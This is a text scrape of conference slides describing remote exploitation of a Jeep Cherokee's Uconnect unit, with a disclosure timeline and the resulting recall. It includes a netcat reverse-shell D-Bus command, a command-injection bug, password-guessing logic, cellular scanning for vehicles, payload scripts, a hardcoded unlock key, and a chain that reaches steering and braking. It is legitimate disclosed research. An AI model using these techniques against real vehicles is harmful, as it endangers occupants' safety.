remote exploitation of an unaltered passenger vhicle€¦ · remote exploitation of an unaltered...
TRANSCRIPT
Remote Exploitation of an Unaltered Passenger Vehicle
Dr. Charlie Miller ([email protected])
Chris Valasek ([email protected])
Introduction
You should know us by now…
Dr. Charlie Miller [Twitter]
Security Engineer@0xcharlie
Chris Valasek [IOActive]
Director of Vehicle Security Research@nudehaberdasher
Disclaimer
• Enjoy the talk• The full details will be in our 90
page white paper
• To be released Aug 10
Public service announcement
Please STOP saying UNHACKABLE,
you’re going to look silly
Overview
• Introduction
• Getting remote code running via Wi-Fi
• Expanding to cellular
• Head unit payloads
• Flashing CAN chip
• Cyberphysical payloads
Remote Attacks
Remote Attack Paradigm
TPMS
Telematics (CDMA/3G/4G/LTE)
Bluetooth
Wi-Fi
In-car apps
1. Remote compromise
Remote keyless entry
Remote Attack Paradigm
Running exploit
CAN / LIN / MOST / Flexray
1. Remote compromise2. Lateralization
Remote Attack Paradigm
Engine
Sensors
Occupant safety
Power Steering
Self-Parking
Radio
Transmission
ABS
CAN / LIN / MOST / Flexray
1. Remote compromise2. Lateralization3. CAN Message analysis (in
advance)
Remote Attack Paradigm
Pre-Collision System
Self-Parking
Adaptive Cruise Control
CAN / LIN / MOST / Flexray
1. Remote compromise2. Lateralization3. CAN Message analysis (in
advance)4. CAN message injection
• Reprogram firmware• Functionality
Running exploit
The Vehicle
2014 Jeep Cherokee
http://www.blogcdn.com/www.autoblog.com/media/2013/02/2014-jeep-cherokee-1.jpg
Uconnect 8.4AN RA4 (Harman Kardon)
Uconnect 8.4AN RA4 (Harman Kardon)
Uconnect 8.4AN RA4 (Harman Kardon)
# pidin info
CPU:ARM Release:6.5.0 FreeMem:91Mb/512Mb BootTime:Jul 30 21:45:38 2014
Processes: 107, Threads: 739
Processor1: 1094697090 Cortex A8 800MHz FPU
Jail Break
Jailbreaking the Uconnect• Was NOT required
for remote exploit
• Was invaluable for gaining knowledge about the OS / services
• NOT, I repeat, NOT needed for remote exploitation
Wi-Fi
Problems with attacks over Wi-Fi• Not on by default
• Need to connect to WPA2 network
WPA2 passwordchar *get_password(){
int c_max = 12;int c_min = 8;
unsigned int t = time(NULL);srand (t);unsigned int len = (rand() % (c_max - c_min + 1)) + c_min;char *password = malloc(len);int v9 = 0; do{
unsigned int v10 = rand();int v11 = convert_byte_to_ascii_letter(v10 % 62);password[v9] = v11;v9++;
} while (len > v9);return password;
Password guessing
• Password based on when unit was first started• With second precision
• We know the year, if you guess the month• 15 million password possibilities
• If you supposed it was during the day• 7 million password possibilities
• Should be possible to brute force in under an hour
Setting the time…local rtcTime = getV850RealtimeClock()
local rtcValid = false
if rtcTime == nil or rtcTime.year == 65535 or rtcTime.month == 255 or rtcTime.day == 255 or
rtcTime.hour == 255 or rtcTime.mi n == 255 or rtcTime.sec == 255 then
dbg.print("Clock: start -- V850 time not received or is set to factory defaults")
...
if rtcValid == false then
dbg.print("Clock: start -- Unable to create the UTC time from V850")
setProperty("timeFormat24", false)
setProperty("enableClock", true)
setProperty("gpsTime", true)
setProperty("manualUtcOffset", 0)
defTime = {}
defTime.year = 2013
defTime.month = 1
defTime.day = 1
defTime.hour = 0
defTime.min = 0
defTime.sec = 0
defTime.isdst = false
setSystemUTCTime(os.time(defTime))
timeFormatOverride = false
enableClockOverride = false
end
Actually its easy!
• My WPA2 password was “TyYMxfPhZxkp”
• This corresponds to Epioch time 0x50e22720
• This is Jan 01 2013 00:00:32 GMT
• Took 32 seconds for WifiSvc to get started up
• Really only a few dozen passwords to try
Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-26 11:23 CDTNmap scan report for 192.168.5.1Host is up (0.0036s latency).PORT STATE SERVICE2011/tcp open raid-cc2021/tcp open servexec4400/tcp open unknown6010/tcp open x116020/tcp open unknown6667/tcp open irc51500/tcp open unknown65200/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
D-Bus
D-Bus: Overview
• Interprocess communications
• Can require authentication• Jeep did NOT
• We used Dfeet to look at services
• Dbus-Python for scripts / exploits
telnet 192.168.5.1 6667Trying 192.168.5.1...
Connected to 192.168.5.1.
Escape character is '^]'.
AUTH ANONYMOUS
OK
4943a53752f52f82a9ea4e6e00000001
BEGIN
D-Bus: Services & Methods
D-Bus: Command Line Injection
function methods.rmTrack(params, context)
return {
result = os.execute("rm \"" .. trail_path_saved ..
params.filename .. "\"")
}
end
NavTrailService
* Many others contained command line injection vulnerabilities
D-Bus: No vulnerability neededNavTrailService
"com.harman.service.NavTrailService":
{"name":"com.harman.service.NavTrailService",
"methods":{"symlinkattributes":"symlinkattributes","getProperties":"getPro
perties","execute":"execute","unlock":"unlock","navExport":"navExport","ls":"
ls","attributes":"attributes“ …
#!python
import dbus
bus_obj=dbus.bus.BusConnection("tcp:host=192.168.5.1,port=6667")
proxy_object=bus_obj.get_object('com.harman.service.NavTrailService','/com/harman/service/NavT
railService')
playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke('execute','{"cmd":"netcat -l -p 6666 | /bin/sh | netcat
192.168.5.109 6666"}')
We basically revealed the vulnerability last year!
Uconnect Payloads
GPS Tracker 3000 #!python
import dbus
bus_obj=dbus.bus.BusConnection("tcp:host=X.X.X.X,port=6667")
proxy_object=bus_obj.get_object('com.harman.service.NDR', '/com/harman/service/NDR')playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke('JSON_GetProperties','{"inprop":["SEN_GPSInfo"]}')
HVACrequire "service"
params = {}control = {}params.zone = "front"control.fan = arg[1]params.controls = control
x=service.invoke("com.harman.service.HVAC","setControlProperties", params)
Radio Volume
require "service"
params = {}params.volume = tonumber(arg[1])x=service.invoke("com.harman.service.AudioSettings", "setVolume", params)
Cellular Exploitation
Netstat Review
# netstat -n | grep LISTEN
tcp 0 0 *.6010 *.* LISTEN
tcp 0 0 *.2011 *.* LISTEN
tcp 0 0 *.6020 *.* LISTEN
tcp 0 0 *.2021 *.* LISTEN
tcp 0 0 127.0.0.1.3128 *.* LISTEN
tcp 0 0 *.51500 *.* LISTEN
tcp 0 0 *.65200 *.* LISTEN
tcp 0 0 *.4400 *.* LISTEN
tcp 0 0 *.6667 *.* LISTEN
Finding the Jeep’s IP
# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33192
inet 127.0.0.1 netmask 0xff000000
pflog0: flags=100<PROMISC> mtu 33192
uap0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
address: 30:14:4a:ee:a6:f8
media: <unknown type> autoselect
inet 192.168.5.1 netmask 0xffffff00 broadcast 192.168.5.255
ppp0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1472
inet 21.28.103.144 -> 68.28.89.85 netmask 0xff000000
Femto-Cell Comms
• Airave 2.0 • We bought 2 ‘stolen’ ones
before getting a working device (Thanks Ebay!)
• Public Jailbreak (turns on port 23)
• Successful in communicating w/ the Jeep!
• Range ~ 30m
How far?
Long Distance Communications (Sprint)
Searching for Vehicles$ bin/masscan 21.0.0.0/8 –p6667
$ bin/masscan 25.0.0.0/8 –p6667
Discovered open port 6667/tcp on 25.18.2.211
Discovered open port 6667/tcp on 25.36.166.111
Discovered open port 6667/tcp on 25.22.203.32
Discovered open port 6667/tcp on 25.17.146.238
Discovered open port 6667/tcp on 25.22.138.67
Discovered open port 6667/tcp on 25.20.97.217
Discovered open port 6667/tcp on 25.23.97.210
Discovered open port 6667/tcp on 25.33.57.216
Discovered open port 6667/tcp on 25.19.52.6
Discovered open port 6667/tcp on 25.32.29.32
Gathering Vehicle Information
./shutupdave.py
Scanning 21.18.23.0...
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-06-16 19:09:28 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Scan complete
Found 2 hosts
21.18.23.151 : 1C4RJFCMXEXXXXXXX , 2014 JEEP GRAND+CHEROKEE+OVERLAND
21.18.23.97 : 1C6RR7PT8DXXXXXXX , 2013 RAM 1500+LONGHORN
…
Vehicles Located via Scanning
2013 DODGE VIPER2013 RAM 15002013 RAM 25002013 RAM 35002013 RAM CHASSIS 55002014 DODGE DURANGO2014 DODGE VIPER2014 JEEP CHEROKEE2014 JEEP GRAND CHEROKEE2014 RAM 15002014 RAM 25002014 RAM 35002014 RAM CHASSIS 55002015 CHRYSLER 2002015 JEEP CHEROKEE2015 JEEP GRAND CHEROKEE
Vehicle Estimates
• We found 19 duplicate VINs in a scan of 2694
vehicles
• Estimated 381,980 +/- 89,393
• We now know that the real number is 1.4
million. We obviously went with a conservative
estimate
Uconnect firmware (v850)
Now we send CAN messages?
Inside Uconnect
CANSPI
Inside the Uconnect
Updating the V850: Firmware
# iocupdate -c 4 -p usr/share/V850/cmcioc.bin
• V850 firmware is NOT signed
• No code signing mechanism present
• Updating only works if v850 in “bootrom” mode
V850 Internals: CAN Modules & Addressing
http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp
V850 Internals: CAN Registers
http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp
V850 Internals: Base Address
V850 Internals: Segments & Initial Values
V850 Internals: CAN Data Buffer XREFs
V850 Internals: Setting CAN Data Values
V850 Internals: SPI Parser
file = '/dev/ipc/ch7'
g = assert(ipc.open(file))
f = assert(io.open(file, "r+b"))
g:write(0xf0, 0x02)
bytes = f:read(0x18)
print(hex_dump(bytes))
g:close()
f:close()
V850 Internals: SPI Memory Corruption Bugs
V850 Internals: Sending Arbitrary CAN Msgs
USB-less upgrade
• To flash v850, it needs to be in bootrom mode
• If you put it in bootrom mode, it restarts OMAP in upgrade mode• Attacker loses control
• Initial bootup code runs from read-only filesystem
• Calls “hd” application which lives in writable portion of filesystem
• Replace hd with your code that can run while v850 in bootrom mode
Make a mistake?
Exploit Chain
Step 1: Find IP address of a vehicle
Step 2: Get code running on OMAP chip
Step 3: Reflash the v850,Reboot
Step 4: Send arbitrary CANmessages
Cyber Physical Internals
wiTECH: Overview
wiTECH: Security Unlocks
wiTECH: SecurityAccess
Uc.init(“G3n3r@ti0n”, “MD5”, “”, “BC”, “AES”, new String[]
{“com.chrysler.lx.UnlockCryptographerTest”,
"com.dcx.securityunlock.encrypted.EncryptedSecurityUnlock", “”,
“com.dcx.NGST.jCanFlash.flashfile.efd2.SecurityUnlockBuilderImpTest”})
;
PAM: Checksums
Jeep Checksums
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 06 7F
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 08 D9
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 19 09
Prius Checksums
IDH: 02, IDL: E4, Len: 05, Data: 98 00 00 00 83
IDH: 02, IDL: E4, Len: 05, Data: 9A 00 00 00 85
IDH: 02, IDL: E4, Len: 05, Data: 9E 00 00 00 89
PAM: Device
PAM: Checksum Code
Capturing CAN messages
This year…METAL
Cyber Physical action!
Normal CAN messages - example
wipers
Turn signals
speedometer
Diagnostic CAN messages
Diagnostic + Normal CAN messages
Us
Target ECUNormal
source of traffic
Shut down source
Us
Target ECUNormal
source of traffic
Become the source!
Us
Target ECUNormal
source of traffic
steering
Braking
Disclosure
Disclosure Timeline
• Oct 24, 2014 -> Vulnerabilities disclosed to FCA
• Mar 2, 2015 -> Disclosed ability to send CAN msgs remotely
• Apr 10, 2015 -> Full scope of hack disclosed
• May 12, 2015 -> FCA informed of cellular vector confirmation
• Jun 2, 2015 -> FCA informed of nation-wide cellular confirmation
• Jul 16, 2015 -> FCA given pre-release copy of our paper/research
• Jul 16, 2015 -> FCA releases Uconnect patch
• Jul 20, 2015 -> Wired article/video
• Jul 24, 2015 -> Sprint network blocks port 6667 traffic
• Jul 24, 2015 -> FCA Recalls 1.4MM vehicles vulnerable to attack
Additional testing?
Impact
Wired story
Recall
stagefright
Conclusion
Conclusions
• Remote compromise of a connected vehicle is possible• This is NOT just a FCA issue. More connectivity requires more security
• These issues are a combination of: OEMs, Tier-1s, Telecom
• Take this information and look at other cars• We’re just two bros with one car
• What might be considered an ‘air-gap’ may not be one in reality• Cellular->Uconnect->Reprogram Firmware->SPI
• Architecture can introduce more hurdles
• Hackers now have an example of making real-world impact
Questions?